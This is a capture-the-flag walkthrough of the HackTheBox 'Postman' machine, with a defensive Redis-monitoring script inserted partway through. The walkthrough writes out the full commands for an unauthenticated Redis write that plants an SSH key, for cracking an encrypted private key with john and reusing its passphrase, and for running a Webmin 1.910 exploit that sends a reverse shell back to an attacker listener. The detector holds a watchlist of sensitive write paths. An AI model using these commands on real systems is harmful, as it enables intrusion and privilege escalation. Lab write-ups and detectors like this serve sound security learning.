Welcome to the Postman writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k


Postman

tags: HTB Easy Linux
Platform: Hackthebox
Difficulty: Easy
OS: Linux

Enumeration

Nmap

To get started, we run a quick open ports scan.

$ nmap -Pn -T4 -p- postman.htb
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-27 18:33 CEST
Nmap scan report for postman.htb (10.10.10.160)
Host is up (0.087s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
6379/tcp  open  redis
10000/tcp open  snet-sensor-mgmt

Nmap done: 1 IP address (1 host up) scanned in 29.58 seconds

Now that we know the open ports, let's scan them in depth.

$ nmap -Pn -A -p 22,80,6379,10000 --script http-enum  postman.htb
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-27 18:44 CEST
Nmap scan report for postman.htb (10.10.10.160)
Host is up (0.086s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-enum: 
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /js/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_  /upload/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_http-server-header: Apache/2.4.29 (Ubuntu)
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.16 (93%), Linux 3.18 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Android 4.2.2 (Linux 3.4) (93%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   86.00 ms 10.10.14.1
2   86.33 ms postman.htb (10.10.10.160)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.25 seconds

As we can see, the server has a Redis service running. We will try to connect without credentials and check whether it responds to an ECHO.

$ redis-cli -h 10.10.10.160
10.10.10.160:6379> ECHO HELLO
"HELLO"
10.10.10.160:6379>

Nice! We can execute commands without authentication!

Exploitation

Redis-cli

Let's try to inject an SSH RSA key.

The first thing we have to do is load our id_rsa.pub file into a key in the server's memory. The surrounding newlines keep the key on its own line once it lands inside the RDB dump.

$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") | redis-cli -h 10.10.10.160 -x set x4v1l0k
OK

Now we point Redis's working directory at the SSH directory, so that the database dump is written there and carries our key.

$ redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir /home/redis/.ssh
(error) ERR Changing directory: Permission denied

Well, as we can see, the redis user does not have a home directory there, so let's try its default installation path.

$ redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config set dbfilename authorized_keys
OK
10.10.10.160:6379> save
OK
10.10.10.160:6379> quit

Great, now we should be able to connect via SSH using the injected RSA key.

$ ssh redis@postman.htb -i id_rsa
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$
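
From the defender's side, the sequence above (CONFIG SET dir, CONFIG SET dbfilename, then SAVE from an unauthenticated client) is exactly what to alert on. The following Python detector is an added example, not part of this writeup: it parses constructed `redis-cli MONITOR` lines that mirror the steps above and flags any client that redirects the dump file into a sensitive path before saving; the sample lines, paths and filename list are constructed here.

```python
import re
from collections import defaultdict

# One line of `redis-cli MONITOR` output looks like:
#   1624819201.202 [0 10.10.14.29:51234] "config" "set" "dir" "/var/lib/redis/.ssh"
MONITOR_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<args>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Locations that turn a SAVE into an arbitrary file write (constructed watchlist;
# the writeup drops authorized_keys into the redis user's .ssh directory).
SUSPICIOUS_DIRS = ("/.ssh", "/root", "/home", "/etc/cron", "/var/spool/cron", "/var/www")
SUSPICIOUS_FILENAMES = {"authorized_keys", "id_rsa", "crontab", ".bashrc", ".profile"}

def parse_monitor_line(line):
    """Return (client, [args]) for one MONITOR line, or None if it is not one."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    return m.group("client"), ARG_RE.findall(m.group("args"))

def detect_redis_write_primitive(lines):
    """Track CONFIG SET dir/dbfilename per client connection and alert when that same
    client then issues SAVE/BGSAVE with the dump pointed at a sensitive location."""
    state = defaultdict(dict)          # client -> {"dir": ..., "dbfilename": ...}
    alerts = []
    for line in lines:
        parsed = parse_monitor_line(line)
        if not parsed:
            continue
        client, args = parsed
        cmd = args[0].lower() if args else ""
        if cmd == "config" and len(args) >= 4 and args[1].lower() == "set":
            key = args[2].lower()
            if key in ("dir", "dbfilename"):
                state[client][key] = args[3]
        elif cmd in ("save", "bgsave"):
            d = state[client].get("dir", "")
            f = state[client].get("dbfilename", "")
            if any(p in d for p in SUSPICIOUS_DIRS) or f in SUSPICIOUS_FILENAMES:
                alerts.append(f"{client}: {cmd.upper()} after CONFIG SET dir={d!r} dbfilename={f!r}")
    return alerts

# Constructed MONITOR lines mirroring the writeup's sequence, plus a benign local client.
SAMPLE_MONITOR = """\
1624819200.101 [0 10.10.14.29:51234] "set" "x4v1l0k" "\\n\\nssh-rsa AAAAB3Nza...constructed\\n\\n"
1624819201.202 [0 10.10.14.29:51234] "config" "set" "dir" "/var/lib/redis/.ssh"
1624819202.303 [0 10.10.14.29:51234] "config" "set" "dbfilename" "authorized_keys"
1624819203.404 [0 10.10.14.29:51234] "save"
1624819210.505 [0 127.0.0.1:40000] "set" "session:42" "abc"
1624819211.606 [0 127.0.0.1:40000] "save"
""".splitlines()

if __name__ == "__main__":
    for alert in detect_redis_write_primitive(SAMPLE_MONITOR):
        print("ALERT", alert)
```

The same rule applies to a hardened deployment: with `requirepass` set, `protected-mode yes` and `CONFIG` renamed or disabled, none of the flagged commands are reachable from an unauthenticated client in the first place.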

Post exploitation

Privilege escalation: redis to Matt

Enumeration

Linpeas

[...]
[+] Backup files
-rwxr-xr-x 1 Matt Matt 1743 Aug 26  2019 /opt/id_rsa.bak
[...]

By running linpeas we find a backup of Matt's id_rsa.

redis@Postman:/tmp$ cat /opt/id_rsa.bak
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
[...]
-----END RSA PRIVATE KEY-----

$ ssh Matt@postman.htb -i id_rsa
load pubkey "id_rsa": invalid format
Enter passphrase for key 'id_rsa':

When we try to connect using this id_rsa we see that it is passphrase-protected, so we are going to try to recover the passphrase.

$ ssh2john id_rsa > id_rsa_hash
$ john id_rsa_hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (id_rsa)
Warning: Only 2 candidates left, minimum 8 needed for performance.
1g 0:00:00:05 DONE (2021-06-27 20:38) 0.1901g/s 2726Kp/s 2726Kc/s 2726KC/sa6_123..*7¡Vamos!
Session completed

When we connect by SSH we see that it accepts the passphrase computer2008 but closes the connection immediately.

$ ssh Matt@postman.htb -i id_rsa
load pubkey "id_rsa": invalid format
Enter passphrase for key 'id_rsa': 
Connection closed by 10.10.10.160 port 22

Maybe we can use the passphrase as the password for user Matt.

redis@Postman:/tmp$ su Matt
Password: 
Matt@Postman:/tmp$ id
uid=1000(Matt) gid=1000(Matt) groups=1000(Matt)

And now we can read the user flag!

Matt@Postman:/tmp$ cd
Matt@Postman:~$ cat user.txt
CENSORED_FLAG

Privilege escalation: Matt to root

Enumeration

Pspy

Running pspy, we can see that Webmin is being run by root.

2021/06/27 19:52:27 CMD: UID=0    PID=732    | /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf 

And when accessing the Webmin panel at the URL https://postman.htb:10000/sysinfo.cgi?xnavigation=1, we see that the Webmin version is 1.910.

Searching the internet for vulnerabilities affecting this version, we find a Python exploit hosted in this GitHub repository.

OK, it's time to exploit: let's start a listener in another terminal and run it!

$ python exp.py --rhost 10.10.10.160 --rport 10000 --lhost 10.10.14.29 --lport 8787 -u Matt -p computer2008 -s yes
****************************** Webmin 1.910 Exploit By roughiz*******************************
*********************************************************************************************
*********************************************************************************************
*********************************************************************************************
****************************** Retrieve Cookies sid *****************************************

********** [+] [Exploit] The Cookie is 132613f2a51c54ed95206d3ec322389d

********************************************************************************************
****************************** Create payload and Exploit ***********************************

********** [+] [Exploit] Verify you nc listener on port 8787 for the incomming reverse shell
$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.160] 49284
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
CENSORED_FLAG

And we are root and can read the root flag!